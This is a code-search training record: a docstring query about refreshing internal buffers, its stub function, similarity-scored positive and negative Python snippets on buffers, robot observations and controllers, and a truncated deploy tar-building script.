[ "def _initialize_mem_buffs():\r\n args = get_args()\r\n\r\n # Initialize memory for checkpointed activations.\r\n if args.distribute_checkpointed_activations:\r\n mpu.init_checkpointed_activations_memory_buffer()\r\n mpu.init_workspace_memory_buffer()\r\n # mpu.init_forward_buffer()\r\n mpu.init_QKV_forward_buffer()\r\n mpu.init_QKV_dense_buffer()\r\n mpu.init_h4h_forward_buffer()\r\n mpu.init_fhh_forward_buffer()\r\n mpu.init_backward_buffer()\r\n mpu.init_parameter_gradient_buffer()\r\n mpu.init_conjunction_gradient_buffer()\r\n # if not args.ParallelTransformer_only:\r\n # mpu.init_lmhead_dense_buffer()", "def create_buffers(self):", "def init_buffer(self):\n \n self.shape.buf = [pi3d.Buffer(self.shape, self.verts, self.texcoords, self.inds, self.norms)]\n self.shape.set_draw_details(self.shader, [self.spritesheet.img])", "def __init__(self, buffer_size=3000):\n self.buffer = []\n self.buffer_size = buffer_size", "def __init__(self, buffer_size=3000):\n self.buffer = []\n self.buffer_size = buffer_size", "def _allocate_buffer_memory(self):\n for channel in self._channels_dict.values():\n if channel.enabled:\n channel.allocate(self._num_captures, self._num_samples)", "def fillBuffer():\n buff[bufferCounter].next = dataIn", "def __init__(self, memset_0=False):\r\n self.memset_0 = memset_0", "def __init__(self, buffer_size: int, batch_size: int):\n self.buffer: list = list()\n self.buffer_size = buffer_size\n self.batch_size = batch_size\n self.idx = 0", "def __init__(self):\n self.buffer = bytearray()", "def __setstate__(self, state):\n shape = state['_DoubleBufferedSharedNumpyArray__np_array1'].shape\n dtype = state['_DoubleBufferedSharedNumpyArray__np_array1'].dtype\n type_id = np_type_id_to_ctypes(dtype)\n self.__shared1 = RawArray(type_id, np.product(shape))\n self.__np_array1 = np.frombuffer(self.__shared1, dtype=dtype).reshape(shape)\n np.copyto(self.__np_array1, state['_DoubleBufferedSharedNumpyArray__np_array1'])\n self.__shared2 = RawArray(type_id, np.product(shape))\n self.__np_array2 = np.frombuffer(self.__shared2, dtype=dtype).reshape(shape)\n np.copyto(self.__np_array2, state['_DoubleBufferedSharedNumpyArray__np_array2'])\n self.__parity = state['_DoubleBufferedSharedNumpyArray__parity']", "def __init__(self):\n\t\tself.dataMemory = sysv_ipc.SharedMemory(65)\n\t\tself.statusMemory = sysv_ipc.SharedMemory(88)\n\t\treturn", "def buf_init(self):\n self.buffer = []\n for _ in range(1000):\n hash_str = '{}{}'.format(self.salt, self.forward_idx).encode()\n self.buffer.append(md5(hash_str).hexdigest())\n self.forward_idx += 1", "def re_init_buffer(self):\n #~ print(self.verts)\n #~ print(self.texcoords)\n #~ print(self.inds)\n self.shape.buf[0].re_init(pts=np.array(self.verts, 'f'),texcoords=np.array(self.texcoords, 'f'))", "def _init(self):\n self._nfields = 0\n self._converted = {}\n self._heapoffset = 0\n self._heapsize = 0\n self._col_weakrefs = weakref.WeakSet()\n self._coldefs = None\n self._gap = 0\n self._uint = False", "def __init__(self, *args):\n _snap.TMem_swiginit(self, _snap.new_TMem(*args))", "def _refresh_buffers(self) -> None:", "def prepareUniformBuffers(self):\n # Vertex shader uniform buffer block\n uboVSSize = sum([glm.sizeof(ubo) for ubo in self.uboVS.values()])\n bufferInfo = vk.VkBufferCreateInfo(\n sType = vk.VK_STRUCTURE_TYPE_BUFFER_CREATE_INFO,\n size = uboVSSize,\n # This buffer will be used as a uniform buffer\n usage = vk.VK_BUFFER_USAGE_UNIFORM_BUFFER_BIT\n )\n # Create a new buffer\n self.uniformBufferVS['buffer'] = vk.vkCreateBuffer(self.device, bufferInfo, None)\n # Get memory requirements including size, alignment and memory type\n memReqs = vk.vkGetBufferMemoryRequirements(self.device, self.uniformBufferVS['buffer'])\n # Get the memory type index that supports host visibile memory access\n # Most implementations offer multiple memory types and selecting the correct one to allocate memory from is crucial\n # We also want the buffer to be host coherent so we don't have to flush (or sync after every update.\n #Note: This may affect performance so you might not want to do this in a real world application that updates buffers on a regular base\n allocInfo = vk.VkMemoryAllocateInfo(\n sType = vk.VK_STRUCTURE_TYPE_MEMORY_ALLOCATE_INFO,\n pNext = None,\n allocationSize = memReqs.size,\n memoryTypeIndex = self.vulkanDevice.getMemoryType(memReqs.memoryTypeBits, vk.VK_MEMORY_PROPERTY_HOST_VISIBLE_BIT | vk.VK_MEMORY_PROPERTY_HOST_COHERENT_BIT)\n )\n # Allocate memory for the uniform buffer\n self.uniformBufferVS['memory'] = vk.vkAllocateMemory(self.device, allocInfo, None)\n # Bind memory to buffer\n vk.vkBindBufferMemory(self.device, self.uniformBufferVS['buffer'], self.uniformBufferVS['memory'], 0)\n # Store information in the uniform's descriptor that is used by the descriptor set\n self.uniformBufferVS['descriptor'] = vk.VkDescriptorBufferInfo(\n buffer = self.uniformBufferVS['buffer'],\n offset = 0,\n range = uboVSSize\n )\n\n self.updateUniformBuffers()", "def init_batch(self):\n pass", "def fill_buffer(self):\n num_of_smp = 0\n while num_of_smp < self.buf_size:\n c, t = self.inlet.pull_chunk(timeout=0.0)\n new_c = []\n new_t = []\n while c:\n new_c += c\n new_t += t\n c, t = self.inlet.pull_chunk(timeout=0.0)\n\n # add samples to buffer\n if any(new_c):\n # add samples\n num_of_smp += len(new_c)\n data_v = [item for sublist in new_c for item in sublist]\n self.gbuffer = np.roll(self.gbuffer, -len(data_v))\n self.gbuffer[-len(data_v):] = data_v\n # add timestamps\n if new_t:\n self.gtimes = np.roll(self.gtimes, -len(new_t))\n self.gtimes[-len(new_t):] = new_t", "def initialize(self):\r\n self.bucket_array.initialize()", "def __init__(self):\n self.mem = [0] * 256\n self.pc = 0\n self.running = False", "def __init__(self, init_size=31):\n self.keys = build_array(init_size) # Parallel arrays - key[]\n self.values = build_array(init_size) # Parallel arrays - values[]\n self.size = init_size\n self.count = 0\n # Task3 counters\n self.count_collisions = 0\n self.total_probe_length = 0\n self.count_rehashes = 0\n self.longest_probe_chain = 0", "def initBuffer(self, env):\n cnt = 0\n while len(self.memory) < self.memory.capacity:\n cnt += 1\n print(\"\\rWarmup Buffer [{:d}]\".format(cnt), end=\"\")\n s = env.reset()\n actionIdx, actionIdxTuple = self.select_action(s, explore=True)\n s_, r, done, info = env.step(actionIdxTuple)\n self.store_transition(s, actionIdx, r, s_, info)\n print(\"\\n => Warmup Buffer Ends\")", "def create_buf(self, num_bytes, cacheable = 0):\n if self.buf is None:\n self.buf = libxlnk.cma_alloc(num_bytes, cacheable)\n if self.buf == ffi.NULL:\n raise RuntimeError(\"Memory allocation failed.\")\n else:\n libxlnk.cma_free(self.buf)\n self.buf = libxlnk.cma_alloc(num_bytes, cacheable)\n bufPhyAddr = libxlnk.cma_get_phy_addr(self.buf)\n self._bufPtr = ffi.cast(\"uint32_t *\",bufPhyAddr)\n self.bufLength = num_bytes", "def initialize(self):\n self.initilize_multiply_array() # m\n self.initialize_cameras()\n self.initialize_electronics()\n self.logger.info('Starting free runs and continuous reads')\n self.camera_microscope.start_free_run()\n self.camera_microscope.continuous_reads()\n self.camera_fiber.start_free_run()\n self.camera_fiber.continuous_reads()\n self.servo_off()\n\n time.sleep(1) #m Without the sleep below initialize_multiply_array does not work", "def memb_init(self):\n self.initialize()", "def _real_initialize(self):\n pass", "def __init__(self, buffer_size, random_seed=None):\n self.buffer_size = buffer_size\n self.count = 0\n self.oldPos = 0\n self.currPos = 0\n self.full = False\n self.buffer = []\n self.featCount = 3\n random.seed(random_seed)\n self.useSubBuffer = False", "def initialize(self):\n self.keys = [None] * BUCKET_SIZE\n self.values = [None] * BUCKET_SIZE" ]
[ "0.7599487", "0.6695344", "0.65703356", "0.6390197", "0.6390197", "0.63680345", "0.6328434", "0.6325463", "0.63085467", "0.6209726", "0.62017787", "0.6195051", "0.6174428", "0.6082165", "0.6043059", "0.6028242", "0.5996737", "0.5959481", "0.5930883", "0.5913184", "0.5906563", "0.58759105", "0.5856205", "0.58493775", "0.58155644", "0.5812441", "0.58085245", "0.5801125", "0.5788991", "0.57766575" ]
0.8179772
0
Refresh internal buffers that must be updated manually.
def _refresh_buffers(self) -> None:
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def refresh(self) -> None:\n if self._is_buffer_full():\n self.stream.close()\n self._open_stream() # re-initial self.stream\n self._buffer = bytearray()\n self._buffer_pointer = -1", "def update(self):\n # pull all available chunks\n c, t = self.inlet.pull_chunk(timeout=0.0)\n new_c = []\n new_t = []\n while c:\n new_c += c\n new_t += t\n c, t = self.inlet.pull_chunk(timeout=0.0)\n\n # add samples to buffer\n if any(new_c):\n # add samples\n data_v = [item for sublist in new_c for item in sublist]\n self.gbuffer = np.roll(self.gbuffer, -len(data_v))\n self.gbuffer[-len(data_v):] = data_v\n # add timestamps\n if new_t:\n self.gtimes = np.roll(self.gtimes, -len(new_t))\n self.gtimes[-len(new_t):] = new_t\n\n # update graph handles\n if self.gbuffer.any():\n for k in range(0, self.channel_count):\n self.handles[k].setData(self.gtimes,\n self.gbuffer[k::self.channel_count])", "def _buffer_all(self):\n self._buffer()", "def refresh(self):\n self.__refresh()", "def _flush_buffer(self):\n pass", "def refresh(self) -> None:\n pass", "def refresh(self) -> None:\n pass", "def refresh(self) -> None:\n pass", "def refresh(self):\n pass", "def refresh(self):\n pass", "def refresh_memory(self):\n if not self.reader:\n self.model.data = None\n self.model.mask = None\n return\n\n memory = self.reader.get_memory(self.model.address, self.model.data_size)\n\n self.model.data = memory.data\n self.model.mask = memory.mask\n self.model.delta = self.reader.delta\n\n if self.view:\n self.view.refresh()", "def refresh(self):\n raise NotImplementedError", "def refresh(self):\n raise NotImplementedError", "def refresh(self):\r\n # todo, use vid_info as property instead of this\r\n # reset properties and rebuild streams\r\n self.setup()", "def clear_buffers(self):\n self.m_param = [\"\" for x in range(self.NUM_BUFFERS + 1)]\n return", "def reload(self,offline_buffer):\n #loading online buffer from offline buffer by sampling (online_buffer.buffer_size) samples \n self.buffer = SumTree(self.buffer_size)\n names, idxs = offline_buffer.sample_batch(self.buffer_size)\n self.offline_idxs = idxs\n state , action , reward, done = data_handler.handler.fetch_single_image(directory = self.directory, branch_name = self.name, observation_name = names[0])\n #loop on names and load in the online buffer\n for i in range(len(names)-1):\n next_state , next_action , next_reward , done = data_handler.handler.fetch_single_image(directory = self.directory, branch_name = self.name, observation_name = names[i+1])\n #done = 0\n self.memorize(state, action, reward, done, next_state, error=[1])\n state , action , reward = next_state , next_action , next_reward", "def updateGraphs(self):\n # first update all three buffers\n tuiBufferName = self.dataClient.recv() # receive 'error'\n while tuiBufferName != 'end buffers':\n tuiData = self.dataClient.recv()\n self.logger.debug(f'Appending {tuiData} to buffer {tuiBufferName}')\n\n if(tuiBufferName == 'error'):\n self.model.errorBuffer.append([float(tuiData.flat[0])])\n if(tuiBufferName == 'output'):\n self.model.outputBuffer.append([float(tuiData.flat[0])])\n if(tuiBufferName == 'reference'):\n self.model.referenceBuffer.append([float(tuiData.flat[0])])\n if(tuiBufferName == 'output-error'):\n self.model.errorPercentage = tuiData.flat[0]\n\n tuiBufferName = self.dataClient.recv()", "def refresh(self):\n raise NotImplementedError(\"To be implemented\")", "def sync_buffers(self, model: nn.Module) -> None:\n # if not update buffer, copy buffer from orig model\n if self.update_buffers:\n warnings.warn(\n '`update_buffers` is set to True in this ema model, and '\n 'buffers will be updated in `update_parameters`.')\n\n avg_buffer = itertools.chain(self.module.buffers())\n orig_buffer = itertools.chain(model.buffers())\n for b_avg, b_orig in zip(avg_buffer, orig_buffer):\n b_avg.data.copy_(b_orig.data)", "def sync_buffers(self, model: nn.Module) -> None:\n # if not update buffer, copy buffer from orig model\n if self.update_buffers:\n warnings.warn(\n '`update_buffers` is set to True in this ema model, and '\n 'buffers will be updated in `update_parameters`.')\n\n avg_buffer = itertools.chain(self.module.buffers())\n orig_buffer = itertools.chain(model.buffers())\n for b_avg, b_orig in zip(avg_buffer, orig_buffer):\n b_avg.data.copy_(b_orig.data)", "def _buffer_flush(self, event):\n self._out_buffer_lock.acquire()\n _out_buffer = self._out_buffer\n self._out_buffer = []\n self._out_buffer_lock.release()\n self.write(''.join(_out_buffer), refresh=False)", "def reset_local_buffers(self) -> None:\n for buf in self.values():\n buf.reset_agent()", "def swap_buffers(self):\n raise NotImplementedError()", "def reset(self):\n\t\tself.buf = []", "def _refresh(self):\n self._need_display_update = True\n self._update()", "def refresh(self):\n self.Refresh()", "def force_update(self):\n self.update(self.poll())", "def Refresh(self):\n pass", "def _Refresh(self):\n raise NotImplementedError", "def re_init_buffer(self):\n #~ print(self.verts)\n #~ print(self.texcoords)\n #~ print(self.inds)\n self.shape.buf[0].re_init(pts=np.array(self.verts, 'f'),texcoords=np.array(self.texcoords, 'f'))" ]
[ "0.7515545", "0.6998398", "0.67986554", "0.67475444", "0.6732874", "0.66470855", "0.66470855", "0.66470855", "0.6610883", "0.6610883", "0.65877867", "0.6537833", "0.6537833", "0.6537378", "0.65073454", "0.64904463", "0.6455442", "0.6443124", "0.6428215", "0.6428215", "0.6427254", "0.63940394", "0.63810223", "0.63764644", "0.63625777", "0.63186866", "0.6291628", "0.6284781", "0.62824017", "0.6233018" ]
0.88663775
0
Compute the observation based on the current state of the robot. In practice, it updates the internal buffer directly for the sake of efficiency. By default, it sets the observation to the value of the measurement, which would not work unless `ObsT` corresponds to `EngineObsType`.
def refresh_observation(self, measurement: EngineObsType) -> None: observation = self.observation observation["t"][()] = measurement["t"] _array_copyto(observation['states']['agent']['q'], measurement['states']['agent']['q']) _array_copyto(observation['states']['agent']['v'], measurement['states']['agent']['v']) sensors_data = observation['measurements'] for key, value in dict.items(measurement['measurements']): _array_copyto(sensors_data[key], value)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def compute_observation(self):\n robotPos, robotOrn = p.getBasePositionAndOrientation(self.botId)\n robotEuler = p.getEulerFromQuaternion(robotOrn)\n linear, angular = p.getBaseVelocity(self.botId)\n return (np.array([robotEuler[0],angular[0],self.vt], dtype='float32'))", "def take_observation(self):\n # Take an observation\n rclpy.spin_once(self.node)\n obs_message = self._observation_msg\n\n # Check that the observation is not prior to the action\n if obs_message is not None:\n msg_time = self.get_time_from_time_msg(obs_message.header.stamp)\n else:\n msg_time = -1\n\n while obs_message is None or msg_time < self.last_action_send_time:\n if obs_message is not None:\n if msg_time < self.last_action_send_time:\n print(\"observation outdated, msg time: %d, last action send time: %d\" % (\n msg_time, self.last_action_send_time))\n # print(\"Sec: %d\" % self._observation_msg.header.stamp.sec)\n # print(\"Nsec: %d\" % self._observation_msg.header.stamp.nanosec) \n # else:\n # print(\"I am in obs_message is none\")\n rclpy.spin_once(self.node)\n obs_message = self._observation_msg\n\n if obs_message is not None:\n msg_time = self.get_time_from_time_msg(obs_message.header.stamp)\n else:\n msg_time = -1\n\n # print(\"Observation taken!\")\n lastObservations = ut_biped.processObservations(obs_message, self.environment)\n # lastImuData = self._imu_msg\n # Set observation to None after it has been read.\n self._observation_msg = None\n\n state = np.r_[np.reshape(lastObservations, -1)]\n\n return state", "def calc_observation(self, t, x, u):\n return", "def calc_observation(self, t, x, u):\n return", "def _get_obs(self):\n full_state = np.copy(self.state)\n if full_state[self.bot_y, self.bot_x] != self.TileState.DIRTY.value:\n full_state[self.bot_y, self.bot_x] = self.TileState.BOT.value\n return full_state", "def update_state(self, a, obs, t):\n \n self.update_weights(a, obs, t) # only update weights, not particles \n self.update_running_average_weights(t) \n return None", "def _get_obs(self):\n return self.observation_function[self.cur_state]", "def update(self, state_value, current_time):\r\n\r\n\t\t# Calculate Error - if SetPoint > 0.0, then normalize error with respect to setpoint\r\n\t\tif self.SetPoint==0.0:\r\n\t\t\terror = state_value - self.SetPoint\r\n\t\telse:\r\n\t\t\terror = (state_value - self.SetPoint)/self.SetPoint \r\n\t\t\r\n\t\tself.current_time = current_time/1000.0 \t\t# Converting from msec to sec\r\n\t\tdelta_time = self.Ts\r\n\t\tdelta_error = error - self.last_error\r\n\r\n\t\tself.ITerm += error * delta_time\r\n\t\t\r\n\t\tself.DTerm = 0.0\r\n\t\tif delta_time > 0:\r\n\t\t\tself.DTerm = delta_error / delta_time\r\n\r\n\t\t# Remember last time and last error for next calculation\r\n\t\tself.last_time = self.current_time\r\n\t\tself.last_error = error\r\n\t\t\r\n\t\t# Calculate u(t) - catch potential division by zero error\r\n\t\ttry:\r\n\t\t\tu = self.Kp * (error + ((1.0/self.Ti) * self.ITerm) + (self.Td * self.DTerm))\r\n\t\texcept ZeroDivisionError:\r\n\t\t\tu = self.Kp * (error + (0.0 * self.ITerm) + (self.Td * self.DTerm))\r\n\t\t\t\t\r\n\t\t# Bound the controller output if necessary (between MinValue - MaxValue) \r\n\t\tif u > self.MaxValue:\r\n\t\t\tself.OutputValue = self.MaxValue\r\n\t\t\tself.ITerm -= error * delta_time \t# Back-calculate the integral error\r\n\t\telif u < self.MinValue:\r\n\t\t\tself.OutputValue = self.MinValue\r\n\t\t\tself.ITerm -= error * delta_time \t# Back-calculate the integral error\r\n\t\telse:\r\n\t\t\tself.OutputValue = u\r\n\t\t\r\n\t\t# Update the last output value\r\n\t\tself.last_OutputValue = self.OutputValue\r\n\t\t\r\n\t\t# Record state, error, y(t), and sample time values\r\n\t\tself.state_history.append(state_value)\r\n\t\tself.error_history.append(error)\r\n\t\tself.output_history.append(self.OutputValue)\r\n\t\tself.sample_times.append(current_time/1000)\t\t# Convert from msec to sec\r\n\t\t\r\n\t\t# Return controller output\r\n\t\treturn self.OutputValue", "def update(self):\n self._ba_attrs = self._api.get_current_data_point(self._ba_uuid)\n self._state = self._ba_attrs[\"temperature\"]", "def update(self):\n self.value = self.sensor.update()", "def _get_observation(self, observation):", "def update(self):\n if self.temperature != None and self.humidity != None:\n self.sensor.set_environmental_data(self.humidity, self.temperature)\n# Trim away error values.\n new_eco2 = self.sensor.eco2\n if new_eco2 < 65535:\n self.eco2 = new_eco2\n self.tvoc = self.sensor.tvoc", "def observe(self, observation):\n # shallow copy observation (deep copy can be expensive)\n obs = observation.copy()\n batch_idx = self.opt.get('batchindex', 0)\n self.observation = obs\n #self.answers[batch_idx] = None\n return obs", "def update_state(self):\n self.last_position = self.current_position\n self.last_distance = self.current_distance\n self.last_collision_time_stamp = self.current_collision_time_stamp\n self.current_kinematics = self.airsim_client.simGetGroundTruthKinematics(vehicle_name=self.drone_name)\n self.current_position = self.current_kinematics.position + self.base_offset\n self.current_collision_time_stamp = self.airsim_client.simGetCollisionInfo(vehicle_name=self.drone_name).time_stamp\n # print(\"DEBUG: simGetCollisionInfo:\", self.airsim_client.simGetCollisionInfo(vehicle_name=self.drone_name))\n # self.pending_death = self.airsim_client.simIsRacerDisqualified(vehicle_name=self.drone_name)\n self.objective_status = self.current_objective.next_gate_status(self.last_position, self.current_position)\n if self.objective_status == GateStatus.CROSSED or self.objective_status == GateStatus.PASSED:\n if self.switch_to_next_objective(): # if track is finished (changes self.last_distance)\n self.track_complete = True\n self.current_distance = self.current_position.distance_to(self.current_objective.gate_pose.position)", "def getObservation(self):\n return self._cur_state", "def update(self, obs, shared):\n self._last_obs[shared['env'].timestamp % IdleTracker._MINIMAP_IDLE_STEPS] = obs\n\n if self._idle_units_map is None:\n self._idle_units_map = np.zeros((shared['minimap'].width(obs), shared['minimap'].height(obs)))\n if self._blacklist_map is None:\n self._blacklist_map = np.zeros((shared['minimap'].width(obs), shared['minimap'].height(obs)))\n\n self._update_idle_units_map(obs, shared)\n self._update_blacklist_map(obs, shared)", "def update(self, state_value, current_time):\r\n\t\t\r\n\t\t# Calculate Error - if SetPoint > 0.0, then normalize error with respect to setpoint\r\n\t\tif self.SetPoint==0.0:\r\n\t\t\terror = state_value - self.SetPoint\r\n\t\telse:\r\n\t\t\terror = (state_value - self.SetPoint)/self.SetPoint \r\n\t\t\r\n\t\t# Bound the controller output (between MinValue - MaxValue)\r\n\t\tif self.ConstantValue > self.MaxValue:\r\n\t\t\tself.OutputValue = self.MaxValue\r\n\t\telif self.ConstantValue < self.MinValue:\r\n\t\t\tself.OutputValue = self.MinValue\r\n\t\telse:\r\n\t\t\tself.OutputValue = self.ConstantValue\r\n\t\t\r\n\t\t# Record state, error and sample time values\r\n\t\tself.state_history.append(state_value)\r\n\t\tself.error_history.append(error)\r\n\t\tself.output_history.append(self.OutputValue)\r\n\t\tself.sample_times.append(current_time/1000)\t\t\t# Convert from msec to sec\r\n\t\t\r\n\t\treturn self.OutputValue", "def receive_observation(self):\n # States are received within the same send_command cycle, i.e. within\n # self.apply_action(). Here we just use the last received robot state to\n # update the animated robot within PyBullet, and update some internal\n # variables.\n# super()._reset_base_pose(self.base_position,\n# self.base_orientation_quaternion)\n\n #joint_angles_dict = dict(zip(self._motor_id_dict.keys(), self.motor_angles))\n #super()._reset_joint_angles(joint_angles_dict)\n self._get_state()", "def _get_observation(self):\n di = super()._get_observation()\n\n # low-level object information\n if self.use_object_obs:\n # Get robot prefix\n if self.env_configuration == \"bimanual\":\n pr0 = self.robots[0].robot_model.naming_prefix + \"left_\"\n pr1 = self.robots[0].robot_model.naming_prefix + \"right_\"\n else:\n pr0 = self.robots[0].robot_model.naming_prefix\n pr1 = self.robots[1].robot_model.naming_prefix\n\n # position and rotation of object\n cube_pos = np.array(self.sim.data.body_xpos[self.cube_body_id])\n cube_quat = T.convert_quat(\n self.sim.data.body_xquat[self.cube_body_id], to=\"xyzw\"\n )\n di[\"cube_pos\"] = cube_pos\n di[\"cube_quat\"] = cube_quat\n\n di[pr0 + \"eef_xpos\"] = self._eef0_xpos\n di[pr1 + \"eef_xpos\"] = self._eef1_xpos\n di[\"handle_0_xpos\"] = np.array(self._handle_0_xpos)\n di[\"handle_1_xpos\"] = np.array(self._handle_1_xpos)\n di[pr0 + \"gripper_to_handle\"] = np.array(self._gripper_0_to_handle)\n di[pr1 + \"gripper_to_handle\"] = np.array(self._gripper_1_to_handle)\n\n di[\"object-state\"] = np.concatenate(\n [\n di[\"cube_pos\"],\n di[\"cube_quat\"],\n di[pr0 + \"eef_xpos\"],\n di[pr1 + \"eef_xpos\"],\n di[\"handle_0_xpos\"],\n di[\"handle_1_xpos\"],\n di[pr0 + \"gripper_to_handle\"],\n di[pr1 + \"gripper_to_handle\"],\n ]\n )\n\n return di", "def tell(self, observation):\n self.time += 1\n new_distribution = [0] * self.num_states\n for s1 in range(self.num_states):\n sensor_term = self.sensor_model(observation, s1)\n prior = 0\n for s0 in range(self.num_states):\n prior += self.transition_model(s0, s1) * self.distribution[s0]\n new_distribution[s1] = sensor_term * prior\n\n self.distribution = new_distribution\n self.distribution = [x / float(sum(self.distribution)) for x in self.distribution]", "def observe_Env(self, mode='all'):\r\n L_cnt, R_cnt, bump,DLightBump, AnalogBump,Infra_Omi, Infra_L, Infra_R = self.achieve_data(mode)\r\n old_state = self.real_state.copy()\r\n\r\n if mode != 'e':\r\n # Check if current state is terminal\r\n terminal,obs = self.check_terminal(bump,DLightBump, AnalogBump,(Infra_Omi, Infra_L, Infra_R))\r\n # update list of obstacles\r\n # maximum count for determining if the obstacle 100% exists\r\n max_cnt =5.0\r\n for o in obs:\r\n # if obstacle is not detected before\r\n if self.obs_ls[0].count(o)<1:\r\n self.obs_ls[0].append(o)\r\n self.obs_ls[1].append(1/max_cnt)\r\n else:\r\n # update probability of this obstacle observed\r\n self.obs_ls[1][self.obs_ls[0].index(o)] += 1.0/max_cnt\r\n\r\n # The reward is the reward obtained after transition (s,a,s')\r\n r = self.cal_reward(bump, DLightBump, AnalogBump,(Infra_Omi, Infra_L, Infra_R))\r\n else:\r\n # if encoder mode, return encoder info only, without calculate rewards and terminals\r\n r= 0\r\n terminal =False\r\n\r\n # obtain postion and heading angle\r\n self.real_state[0],self.real_state[1],self.real_state[2] = self.Motion.get_CurPos(L_cnt,R_cnt)\r\n\r\n return old_state, self.real_state,r, terminal, (L_cnt, R_cnt, bump,DLightBump, AnalogBump)", "def value(self, observation, prev_action, prev_reward):\n agent_inputs = buffer_to((observation, prev_action, prev_reward),\n device=self.device)\n _mu, _log_std, value, _rnn_state = self.model(*agent_inputs, self.prev_rnn_state)\n return value.to(\"cpu\")", "def _reset(self):\n self.obs_buffer.clear()\n obs = self._convert(self.env.reset())\n self.buffer.clear()\n self.counter = 0\n for _ in range(self.n - 1):\n self.buffer.append(np.zeros_like(obs))\n self.buffer.append(obs)\n obsNew = np.stack(self.buffer, axis=self.ch_axis)\n return obsNew.astype(np.float32) * self.scale", "def _update_loc(self) -> None:\n self.state[:, :, Boids.Attr.LOC] += self.state[:, :, Boids.Attr.VEL]\n # wrap-around the simulated environment\n self.state[:, :, Boids.Attr.LOC] %= np.expand_dims(self.env_bounds, axis=1)", "def update(self):\n self._client.update()\n\n self._current_operation_mode = self._device.get_run_mode()\n self._target_temperature = self._device.target_temperature\n self._current_temperature = self._device.current_temperature\n self._min_temp = self._device.min_temp\n self._max_temp = self._device.max_temp\n\n self._update_attributes_from_device()\n\n # set whether device is in away mode\n if (\n self._current_operation_mode == CONST_MODE_AWAY\n or self._current_operation_mode == CONST_MODE_FROST\n ):\n self._away = True\n else:\n self._away = False\n\n # set whether device is on/off\n if self._current_operation_mode == CONST_MODE_OFF:\n self._on = False\n else:\n self._on = True", "def update(self, state_value, current_time):\r\n\t\t\r\n\t\t# Calculate Error - if SetPoint > 0.0, then normalize error with respect to setpoint\r\n\t\tif self.SetPoint==0.0:\r\n\t\t\terror = state_value - self.SetPoint\r\n\t\t\tincrement = 0.0\r\n\t\telse:\r\n\t\t\terror = (state_value - self.SetPoint)/self.SetPoint \r\n\t\t\tif error > 0.0:\r\n\t\t\t\tincrement = self.OutputValueIncrement\r\n\t\t\telse:\r\n\t\t\t\tincrement = -self.OutputValueIncrement\r\n\t\t\r\n\t\t# Bound the controller output (between MinValue - MaxValue)\r\n\t\tif self.LastOutputValue+increment > self.MaxValue:\r\n\t\t\tself.OutputValue = self.MaxValue\r\n\t\telif self.LastOutputValue+increment < self.MinValue:\r\n\t\t\tself.OutputValue = self.MinValue\r\n\t\telse:\r\n\t\t\tself.OutputValue = self.LastOutputValue+increment\r\n\t\t\r\n\t\t# Record state, error and sample time values\r\n\t\tself.state_history.append(state_value)\r\n\t\tself.error_history.append(error)\r\n\t\tself.output_history.append(self.OutputValue)\r\n\t\tself.sample_times.append(current_time/1000)\t\t\t# Convert from msec to sec\r\n\t\t\r\n\t\tself.LastOutputValue = self.OutputValue\r\n\t\t\r\n\t\treturn self.OutputValue", "def _update(self, bandit): \n \n bandit_logs = self.logging[bandit]\n bandit = bandit.id\n if not bandit_logs['actions']:\n estimate = 0 # if not taken till now then 0 is assigned\n actions = 0\n else:\n estimate = bandit_logs['reward'] / bandit_logs['actions'] # if not assigned\n actions = bandit_logs['actions']\n self.mu[bandit] = (self.mu_pri[bandit]/self.var_pri[bandit] + actions*estimate/self.var0)/(actions/self.var0 + 1/self.var_pri[bandit])\n self.var[bandit] = 1/(actions/self.var0 + 1/self.var[bandit])", "def get_observation(self):\n # Check if there is an observation pending\n if self.observation_pending:\n raise RuntimeError(\"There is already a pending observation. \"\n \"The pending observation has to be answered first\")\n # Set pending observation to true\n self.observation_pending = True\n # Get the current environment\n obs = self.__gen_observation(self.current_player, roll_dice=True)\n\n # Add the bord and dice before the move to the history\n self.__add_to_hist()\n return obs, self.current_player", "def value(self, observation, prev_action, prev_reward):\n model_inputs = buffer_to((observation, prev_action, prev_reward),\n device=self.device)\n _mu, _log_std, value = self.model(*model_inputs)\n return value.to(\"cpu\")", "def update(self):\n\n obstVals = self.robot.getDepth(self.startCol, self.startRow,\n self.sampleWidth, self.sampleHeight)\n\n masked_obstVals = numpy.ma.masked_array(obstVals, obstVals == 0)\n\n if numpy.ma.count(masked_obstVals) == 0:\n meanDistance = 500\n else:\n meanDistance = numpy.mean(masked_obstVals)\n if meanDistance < 500:\n meanDistance = 500\n\n if meanDistance < 1200: # Changing this value will change how sensitive robot is to walls\n self.setVector(self.speedMult / meanDistance, 180 - self.angle)\n else:\n self.setVector(0.0, 0.0)" ]
[ "0.614435", "0.6122056", "0.5907372", "0.5907372", "0.57816315", "0.5757078", "0.5697894", "0.56669545", "0.56475073", "0.5640076", "0.5546796", "0.55234987", "0.55183667", "0.5510763", "0.5506494", "0.5496655", "0.5493527", "0.5485058", "0.5471934", "0.54646724", "0.5458043", "0.5446013", "0.5427273", "0.54177433", "0.5404561", "0.53833807", "0.5380111", "0.5331171", "0.53199023", "0.53156495" ]
0.6410189
0
Main entyr point into the program. Checks that everytyhing is in order, and then creates the tar file to deploy. None. None. None. None.
def main(): print "Starting tar-maker script.." # String of files we're going to be looking for files="runlocaltests.py testprocess.py verifyfiles.mix cleanup_deploy.py hashes.dict upgrade_nodes.sh deploy_helper.py" # TODO: add list of 'optional files' to include # get the files passed in as arguments files_from_args = '' # 1 skips this file name print for eachfile in range(1, len(sys.argv)): print "Adding custom file: "+sys.argv[eachfile] files_from_args+=' '+sys.argv[eachfile] print # mash the two strings together now files+=files_from_args # Total number of files split by spaces total_files=len(files.split(' ')) # Counter for found files num_files_found=0 # Temporary tar, incrementally we'll build it up # Will remove the temp files (since I use -update flag) # for building up the .tar if os.path.isfile('./deploy.tar.temp'): os.remove('./deploy.tar.temp') for filename in files.split(' '): print ' Looking for '+filename+' in '+os.getcwd() if os.path.isfile('./'+filename): print ' File found!' num_files_found += 1 shellexec('tar -rf deploy.tar.temp '+filename) else: print ' WARNING: '+filename+' NOT FOUND' print print "Found "+str(num_files_found)+" of "+str(total_files)+" necessary files." print # Did we find all of the files? if num_files_found == total_files: print print 'All files found, finishing tar..' # rename the file to the final name. # this will over-write current deploy.tar in the dir if one exists shellexec('mv deploy.tar.temp deploy.tar') return 0 else: print 'FATAL ERROR: Not all the files where found, please check that ' print ' this script is in the same directory as the 